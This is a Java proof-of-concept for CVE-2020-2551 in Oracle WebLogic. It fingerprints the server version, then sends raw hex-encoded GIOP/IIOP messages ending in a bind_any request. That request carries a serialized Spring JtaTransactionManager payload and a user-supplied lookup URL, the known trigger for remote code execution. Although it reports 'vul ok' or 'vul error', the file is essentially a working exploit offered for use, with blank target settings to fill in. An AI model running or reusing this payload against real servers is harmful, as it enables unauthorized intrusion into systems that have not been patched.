import cn.hutool.core.util.HexUtil;
import cn.hutool.core.util.ReUtil;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;

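/**
 * Title: NewPoc
 * Description: Proof-of-concept checker for CVE-2020-2551. It detects the
 * WebLogic version, then exchanges hex-encoded GIOP messages with the target
 * over a raw socket and reports "vul ok" or "vul error".
 * Date: 2020/2/26 4:23 PM
 * Email: woo0nise@gmail.com
 * Company: www.r4v3zn.com
 *
 * @author R4v3zn
 * @version 1.0.0
 */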
public class CVE_2020_2551 {

    /**
     * Command-line entry point: runs {@link #poc(String, Integer, String)}
     * against the target configured in the local constants below.
     *
     * @param args unused
     * @throws Exception propagated from {@code poc}
     */
    public static void main(String[] args) throws Exception {
        // Target settings are fixed here; edit before running.
        final String targetHost = "";
        final int targetPort = 7001;
        final String lookupUrl = "";
        poc(targetHost, targetPort, lookupUrl);
    }

    /**
     * Runs the check against one target.
     *
     * <p>Steps, in order:
     * <ol>
     *   <li>detect and print the WebLogic version via {@code getVersion(ip, port)};</li>
     *   <li>open a socket and send a GIOP message carrying the ASCII id
     *       {@code NameService};</li>
     *   <li>extract the object key ({@code getKeyHex}) and the advertised host
     *       ({@code getIp}) from the response;</li>
     *   <li>send two {@code _non_existent} requests, adopting a new key if the
     *       first response carries one;</li>
     *   <li>hand over to {@code bindAny}, which prints the final verdict.</li>
     * </ol>
     *
     * <p>Prints {@code "vul error"} and returns when the connection fails, the
     * first exchange fails, or no object key can be extracted. The socket is
     * always closed before this method returns.
     *
     * @param ip   target host
     * @param port target port
     * @param url  URL that {@code bindAny} embeds in its request
     * @throws Exception if one of the later exchanges fails
     */
    public static void poc(String ip, Integer port, String url) throws Exception {
        String version = getVersion(ip, port);
        System.out.println("weblogic version --> "+version);
        Socket connection;
        try {
            connection = new Socket(ip, port);
        } catch (IOException e) {
            System.out.println("vul error");
            return;
        }
        // try-with-resources guarantees the socket is closed on every exit path.
        try (Socket socket = connection) {
            /* iiop == 1 */
            String nameServerMsg = "47494f50010200030000001700000002000000000000000b4e616d6553657276696365";
            byte[] nameServerByte;
            try {
                nameServerByte = sendSocket(nameServerMsg, socket);
            } catch (Exception e) {
                System.out.println("vul error");
                return;
            }
            String nameServerHex = binaryToHexString(nameServerByte);
            // get key; getKeyHex returns null when no key marker is present
            String key = getKeyHex(nameServerHex, true);
            if (key == null || key.isEmpty()) {
                System.out.println("vul error");
                return;
            }
            // Extract the host advertised in the response (may be a NAT/internal address).
            // ISO-8859-1 maps every byte to one char, so the decode is platform independent.
            String iiopIp = "iiop://"+getIp(new String(nameServerByte, StandardCharsets.ISO_8859_1));
            // key length in bytes, as 8 hex digits
            String keyLength = addZeroForNum(Integer.toHexString(key.length()/2), 8);
            /* iiop == 2 */
            // op=_non_existent
            String newSend = "000000030300000000000000"+keyLength+key+"0000000e5f6e6f6e5f6578697374656e7400000000000006000000050000001800000000000000010000000a3132372e302e312e3100d80100000006000000f0000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000100000000000000b4000102000000000a3132372e302e312e3100d8010000006400424541080103000000000100000000000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000331320000000000014245412c000000100000000000000000171db96932f5c18300000001000000010000002c0000000000010020000000030001002000010001050100010001010000000003000101000001010905010001000000010000000c0000000000010020050100010000000f0000002000000000000000000000000000000001000000000000000001000000000000004245410000000005000c020103000000"+setIpHex(iiopIp);
            newSend = "47494f5001020000"+addZeroForNum(Integer.toHexString(newSend.length()/2),8)+newSend;
            byte[] existentByte = sendSocket(newSend, socket);
            // get new key; keep the previous one when the response carries none
            String newKey = getKeyHex(binaryToHexString(existentByte), false);
            if (newKey != null && !newKey.isEmpty()) {
                key = newKey;
            }
            // key length
            keyLength = addZeroForNum(Integer.toHexString(key.length()/2), 8);
            /* iiop == 3 */
            // op=_non_existent
            newSend = "000000040300000000000000"+keyLength+key+"0000000e5f6e6f6e5f6578697374656e7400000000000001"+setIpHex(iiopIp);
            newSend = "47494f5001020000"+addZeroForNum(Integer.toHexString(newSend.length()/2),8)+newSend;
            sendSocket(newSend, socket);
            /* iiop == 4 */
            // op=bind_any
            bindAny(key, keyLength, url, socket, version);
        }
    }

    /**
     * Builds and sends the final request (operation name {@code bind_any}) on an
     * already-open socket and prints {@code "vul ok"} or {@code "vul error"}
     * depending on the response.
     *
     * <p>The request is assembled as one hex string: fixed header, body length,
     * request id, flags, object key, operation name, padded service-context
     * list, a version-specific payload, and finally the length and hex encoding
     * of {@code url}.
     *
     * @param key       object key as a hex string
     * @param keyLength length of {@code key} as a hex string (the caller in this
     *                  file passes 8 zero-padded hex digits)
     * @param url       URL appended to the payload
     * @param socket    connected socket to send on; not closed here
     * @param version   WebLogic version string; only versions containing
     *                  12.2.1.3, 12.2.1.4, 10.3.6.0 or 12.1.3.0 are handled
     * @throws Exception if sending or reading fails
     */
    public static void bindAny(String key, String keyLength,String url, Socket socket, String version) throws Exception {
        // A response whose hex equals this fixed value is treated as success below.
        String checkHex = "47494f50010200010000000d00000004000000000000000000";
        // header + length (starts with ASCII "GIOP")
        String header = "47494f5001020000" ;
        // request id
        String requestId = "00000005";
        // response flags
        String responseFlags = "03";
        // reserved
        String reserved = "000000";
        // target address
        String targetAddress = "0000"+"0000";
        // operation length + operation (ASCII "bind_any" plus a terminating zero byte)
        String operationLength = "0000000962696e645f616e7900";
        // body length placeholder (8 zeros); only used to measure tmp below
        String dataLength = addZeroForNum("",8);
        String serviceContextList = "00000000000000";
        String subData = "";
        // tmp is never sent; it exists only so the padding can be computed from its length
        String tmp = header+dataLength+requestId+responseFlags+reserved+targetAddress+keyLength+key+operationLength+serviceContextList;
        System.out.println("字节码余 --> "+(tmp.length()%16));
        String padding = "";
        // 16 hex chars = 8 bytes, so this is the number of bytes past the last 8-byte boundary.
        // NOTE(review): pads by the remainder itself rather than (8 - remainder) - confirm intended.
        int paddingCount = (tmp.length()%16)/2;
        // build the padding bytes
        if (paddingCount > 0){
            for (int i = 0; i < paddingCount; i++ ) {
                padding += "00";
            }
        }
        serviceContextList += padding;
        // NOTE(review): urlLength is never read; the same expression is recomputed when appended to subData.
        String urlLength = addZeroForNum(Integer.toHexString(url.length()),8);
        if(version.contains("12.2.1.3")||version.contains("12.2.1.4")){
            /*
             * WebLogic 12.2.1.3.0 or WebLogic 12.2.1.4.0
             */
             subData = "000000010000000568656c6c6f00000000000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000074524d493a636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765723a413235363030344146343946393942343a3143464133393637334232343037324400ffffffff0001010000000000000001010101000000000000000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000";
        }else if(version.contains("10.3.6.0") || version.contains("12.1.3.0")){
            /*
             * WebLogic 10.3.6.0.0 or WebLogic 12.1.3.0.0
             */
            subData += "000000010000000568656c6c6f00000000000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000074524d493a636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765723a304433303438453037423144334237423a3445463345434642423632383938324600ffffffff0001010000000000000001010100000000000000000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000";
        }else{
            // any other version string is not handled
            System.out.println("vul error");
            return;
        }
        // url length (in chars) as 8 hex digits, followed by the hex-encoded url
        subData += addZeroForNum(Integer.toHexString(url.length()),8);
        subData += HexUtil.encodeHexStr(url);
        String body = requestId + responseFlags + reserved + targetAddress + keyLength + key + operationLength + serviceContextList + subData;
        // prefix the body with its byte length and append both to the fixed header
        header += (addZeroForNum(Integer.toHexString(body.length()/2),8)+body);
        byte[] bindAnyByte = sendSocket(header, socket);
        String bindAny = new  String(bindAnyByte);
        String bindAnyHex = binaryToHexString(bindAnyByte);
        // success if the reply mentions the MARSHAL id or AlreadyBound, or matches checkHex exactly
        if(bindAny.contains("omg.org/CORBA/MARSHAL:1.0") || checkHex.equals(bindAnyHex) || bindAny.contains("AlreadyBound")){
            System.out.println("vul ok");
        }else{
            System.out.println("vul error");
        }
    }

    /**
     * Detects the WebLogic version of a target.
     *
     * <p>The HTTP console login page is tried first; when that yields an empty
     * string, the T3 probe is used instead.
     *
     * @param ip   target host
     * @param port target port
     * @return the detected version, or an empty string when both probes fail
     */
    public static String getVersion(String ip, Integer port)  {
        String detected = getVersionByHttp("http://" + ip + ":" + port);
        // Fall back to T3 only when HTTP gave nothing.
        return "".equals(detected) ? getVersionByT3(ip, port) : detected;
    }

    /**
     * Reads the WebLogic version from the console login page over HTTP.
     *
     * <p>Fetches {@code url + "/console/login/LoginForm.jsp"}, takes the text
     * of the element with id {@code footerVersion} and passes it to
     * {@code getVersion(String)}.
     *
     * @param url base URL of the server
     * @return the version, or an empty string on any failure (unreachable host,
     *         missing element, ...)
     */
    public static String getVersionByHttp(String url){
        final String loginPage = url + "/console/login/LoginForm.jsp";
        try {
            Document page = Jsoup.connect(loginPage).get();
            String footerText = page.getElementById("footerVersion").text();
            return getVersion(footerText);
        } catch (Exception e) {
            // Best effort: any failure means "version unknown".
            return "";
        }
    }

    /**
     * Reads the WebLogic version through a T3 probe.
     *
     * <p>Opens a socket, sends a fixed hex-encoded message (it starts with the
     * ASCII text {@code "t3 12.2.1"}) and passes the reply to
     * {@code getVersion(String)}. The socket is closed on every path, including
     * when the exchange fails.
     *
     * @param ip   target host
     * @param port target port
     * @return the version, or an empty string on any failure
     */
    public static String getVersionByT3(String ip, Integer port) {
        String getVersionMsg = "74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a";
        try (Socket socket = new Socket(ip, port)) {
            byte[] rspByte = sendSocket(getVersionMsg, socket);
            // Explicit single-byte charset keeps the decode independent of the platform default.
            return getVersion(new String(rspByte, StandardCharsets.ISO_8859_1));
        } catch (Exception ignored) {
            // Best effort: any failure means "version unknown".
            return "";
        }
    }

    /**
     * Extracts a version number from free text.
     *
     * <p>Every {@code "HELO:"}, {@code ".false"} and {@code ".true"} is removed
     * first; the first run of digits and dots in what remains is the result.
     *
     * @param content text to search; may be {@code null}
     * @return the first digits-and-dots run, or an empty string when
     *         {@code content} is {@code null} or contains none
     */
    public static String getVersion(String content){
        if (content == null) {
            return "";
        }
        String cleaned = content.replace("HELO:", "").replace(".false","").replace(".true", "");
        // Only the first match is needed, so stop there instead of collecting all of them.
        Matcher versionMatcher = Pattern.compile("[\\d\\.]+").matcher(cleaned);
        return versionMatcher.find() ? versionMatcher.group(0) : "";
    }

    /**
     * Sends a hex-encoded message on a socket and returns the reply.
     *
     * <p>The message is decoded with {@code hexStrToBinaryStr}, written and
     * flushed; then a single {@code read} of up to 4096 bytes is performed.
     * The socket and its streams are left open for the caller.
     *
     * @param sendMessage message to send, as a hex string
     * @param socket      connected socket
     * @return the bytes returned by that single read
     * @throws IOException if the peer closes the connection before sending anything
     * @throws Exception   on any other I/O or decoding failure
     */
    public static byte[] sendSocket(String sendMessage,Socket socket) throws Exception {
        OutputStream out = socket.getOutputStream();
        InputStream is = socket.getInputStream();
        out.write(hexStrToBinaryStr(sendMessage));
        out.flush();
        byte[] bytes = new byte[4096];
        int length = is.read(bytes);
        if (length < 0) {
            // read() returns -1 at end of stream; fail clearly rather than copying a negative range.
            throw new IOException("connection closed by peer before a response was received");
        }
        return Arrays.copyOf(bytes, length);
    }

    /**
     * Left-pads a string with {@code '0'} up to a minimum length.
     *
     * @param str       string to pad; must not be {@code null}
     * @param strLength minimum length of the result
     * @return {@code str} unchanged when it is already at least
     *         {@code strLength} long, otherwise {@code str} with leading zeros
     */
    public static String addZeroForNum(String str, int strLength) {
        int currentLength = str.length();
        if (currentLength >= strLength) {
            return str;
        }
        // One builder sized for the result instead of a new buffer per added zero.
        StringBuilder padded = new StringBuilder(strLength);
        for (int i = currentLength; i < strLength; i++) {
            padded.append('0');
        }
        return padded.append(str).toString();
    }

    /**
     * Extracts the host part of the first http(s) URL found in a text.
     *
     * <p>The host may include a port ({@code host:port}); the URL must be
     * followed by a {@code '/'} to be recognised.
     *
     * @param content text to search
     * @return the host (and port, if present), or an empty string when no URL
     *         is found
     */
    public static String getIp(String content){
        Matcher hostMatcher = Pattern.compile("https?://([\\w\\:.-]+)/").matcher(content);
        return hostMatcher.find() ? hostMatcher.group(1) : "";
    }

    /**
     * Builds the hex fragment that carries an address string.
     *
     * <p>Layout, all hex: the fixed tag {@code 4245410e}, a 4-byte length
     * (address bytes + 9), four zero bytes, a 4-byte length (address bytes + 1),
     * the hex-encoded address, and one terminating zero byte.
     *
     * <p>Both length fields are always 8 hex digits, so short addresses can no
     * longer produce an odd-length hex string. Lengths are counted in encoded
     * bytes, taken from the hex encoding itself. For ASCII addresses whose
     * length fields fit in two hex digits the output is unchanged.
     *
     * @param ip address string to embed (the caller in this file passes
     *           {@code "iiop://" + host})
     * @return the hex fragment
     */
    public static String setIpHex(String ip){
        String addressHex = HexUtil.encodeHexStr(ip);
        int addressBytes = addressHex.length() / 2;
        return "4245410e"
                + String.format("%08x", addressBytes + 9)
                + "00000000"
                + String.format("%08x", addressBytes + 1)
                + addressHex
                + "00";
    }

    /**
     * Extracts the object key from a hex-encoded response.
     *
     * <p>The key starts at the marker {@code 00424541} and its length in bytes
     * is read from the 8 hex digits immediately before the marker.
     *
     * @param rspHex response as a hex string; may be {@code null}
     * @param flag   {@code true}: use the first marker. Otherwise: return
     *               {@code null} if the response contains
     *               {@code 0000000300000000}, else use the last marker.
     *               A {@code null} flag is treated as {@code false}.
     * @return the key as a hex string (marker included), or {@code null} when
     *         there is no marker, no room for the length prefix, or the
     *         declared length is invalid or runs past the end of the response
     */
    public static String getKeyHex(String rspHex, final Boolean flag){
        final String startHex = "00424541";
        if (rspHex == null) {
            return null;
        }
        int startIndex;
        if (Boolean.TRUE.equals(flag)) {
            startIndex = rspHex.indexOf(startHex);
        } else if (rspHex.contains("0000000300000000")) {
            return null;
        } else {
            startIndex = rspHex.lastIndexOf(startHex);
        }
        // Covers "not found" (-1) and a marker too close to the start to have a length prefix.
        if (startIndex < 8) {
            return null;
        }
        long keyLength;
        try {
            // long: 8 hex digits can exceed Integer.MAX_VALUE
            keyLength = Long.parseLong(rspHex.substring(startIndex - 8, startIndex), 16);
        } catch (NumberFormatException e) {
            return null;
        }
        long endIndex = startIndex + keyLength * 2;
        if (keyLength < 0 || endIndex > rspHex.length()) {
            return null;
        }
        // extract the key
        return rspHex.substring(startIndex, (int) endIndex);
    }

    /**
     * Converts a byte array to a lower-case hex string, two digits per byte.
     *
     * @param bytes bytes to encode; must not be {@code null}
     * @return hex string of length {@code 2 * bytes.length}
     */
    public static String binaryToHexString(byte[] bytes) {
        final char[] digits = "0123456789abcdef".toCharArray();
        // Pre-sized builder: avoids re-copying the whole result for every byte.
        StringBuilder hex = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            hex.append(digits[(b & 0xF0) >> 4]).append(digits[b & 0x0F]);
        }
        return hex.toString();
    }

    /**
     * Decodes a hex string into bytes. Space characters are ignored.
     *
     * @param hexString hex digits, optionally separated by spaces
     * @return the decoded bytes
     * @throws IllegalArgumentException if the number of hex digits is odd
     * @throws NumberFormatException    if a digit pair is not valid hex
     */
    public static byte[] hexStrToBinaryStr(String hexString) {
        // Literal replace; no regex is needed to strip spaces.
        String compact = hexString.replace(" ", "");
        int len = compact.length();
        if ((len & 1) != 0) {
            // Reject up front instead of failing on the dangling last digit.
            throw new IllegalArgumentException("hex string must have an even number of digits, got " + len);
        }
        byte[] bytes = new byte[len / 2];
        for (int i = 0; i < bytes.length; i++) {
            String pair = compact.substring(2 * i, 2 * i + 2);
            bytes[i] = (byte) Integer.parseInt(pair, 16);
        }
        return bytes;
    }
}